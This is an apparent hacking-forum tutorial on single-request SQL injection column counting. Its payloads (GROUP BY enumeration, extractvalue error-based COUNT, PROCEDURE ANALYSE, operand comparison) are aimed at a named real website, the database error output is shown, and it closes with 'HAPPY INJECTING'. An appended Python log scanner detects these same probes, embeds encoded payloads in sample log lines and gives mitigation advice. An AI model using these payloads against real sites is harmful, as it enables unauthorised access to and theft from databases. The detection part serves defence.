In this tutorial I'm going to discuss the ways to count all columns in a single request. Usually we use the ORDER BY command to count columns one by one, which takes time, and we are always looking for easier ways. This guide will help you in that case.
I will show you some of the best ways to count columns.
METHOD 1
Using GROUP BY
This method is known to some people, but I'm going to cover it for newbies as well. It is very simple: we build a GROUP BY command that counts the columns in one request. We give GROUP BY a long list of numbers, and when we execute the command the error it returns names the first column number that does not exist, which tells us the total number of columns.
For example:
http://www.pistoiablues.com/news.php?id=111' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +
This command will return the total number of columns:
Unknown column '9' in 'group statement'
Column 9 is the first one that does not exist, so there are 8 columns in total.
METHOD 2
Using COUNT Function
In this method we use the COUNT function to count the total number of columns. We use COUNT with XPATH or error-based injection, and we also have to guess one table name in order to count all the valid columns from the database. I will use XPATH injection with extractvalue.
For example:
http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
Replace TABLE_NAME_HERE with any table name from the database and execute the command. It will return the total number of columns in that table.
http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='news' and table_schema=database())))--+
XPATH syntax error:':8'
So there are 8 columns in total.
METHOD 3
USING PROCEDURE ANALYSE Function
Only a few people know this method. Here we use the PROCEDURE ANALYSE function to count the total number of columns. This function works really well. We just execute this command and look at the response from the target site:
http://www.pistoiablues.com/news.php?id=111' Procedure Analyse()--+
Here we didn't get any kind of error, but if we look at the web page we can see that there are 8 slashes, so the total number of columns is 8.
METHOD 4
Using URL Tables
In this method we count the total number of columns through the tables that appear in our target URL. For example:
Product.php?id=
Page.php?id=
News.php?id=
The command we send is appended to the SQL query inside that script's PHP code.
For example, we gave this command for counting the columns:
News.php?id=2 order by 3
So the query that runs behind it is
SELECT * FROM NEWS WHERE ID=2
We will use those table names to prepare our column count command.
http://www.pistoiablues.com/news.php?id=111' and (select * from news)=(select 0)--+
And we find that the total number of columns is 8:
Operand should contain 8 column(s)
These are easy and simple ways to count the total number of columns in one request, and they will help you while injecting.
HAPPY INJECTING !!
AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee
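Each of the four single-request probes above leaves a recognisable pattern in the web server's access log. The detection sketch below is an added example, not part of the original post; the signature names, the combined log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# One signature per column-count probe described above (names are this example's own).
SIGNATURES = {
    "group_by_enumeration": re.compile(
        r"\b(?:group|order)\s+by\s+\d+(?:\s*,\s*\d+){4,}", re.I),
    "extractvalue_error": re.compile(r"\bextractvalue\s*\(", re.I),
    "procedure_analyse": re.compile(r"\bprocedure\s+analyse\s*\(", re.I),
    "operand_comparison": re.compile(
        r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\(\s*select\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(raw):
    """Decode twice (double encoding), drop /* */ comments, collapse whitespace."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify(query_string):
    """Return the sorted names of all signatures found in one query string."""
    text = normalise(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(log_lines):
    """Return (line_number, path, signature_names) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        names = classify(query)
        if names:
            hits.append((number, path, names))
    return hits

# Constructed sample log (documentation IP range); lines 1 and 6 are benign.
PREFIX = '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=111'
SAMPLE_LOG = [PREFIX + payload + ' HTTP/1.1" 200 512' for payload in (
    "",
    "%27%20group%20by%201,2,3,4,5,6,7,8,9,10--%20+",
    "%27%20and%20extractvalue(0x3a,concat(0x3a,(select%20count(*)"
    "%20from%20information_schema.columns)))--+",
    "%27%20Procedure%20Analyse()--+",
    "%27%20and%20(select%20*%20from%20news)=(select%200)--+",
    "&q=group%20by%201,2",
)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Methods 1, 2 and 4 depend on MySQL error text being echoed into the page, so suppressing database errors in responses and binding the id value as a query parameter removes what these requests rely on.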
Good One :)
Thanks.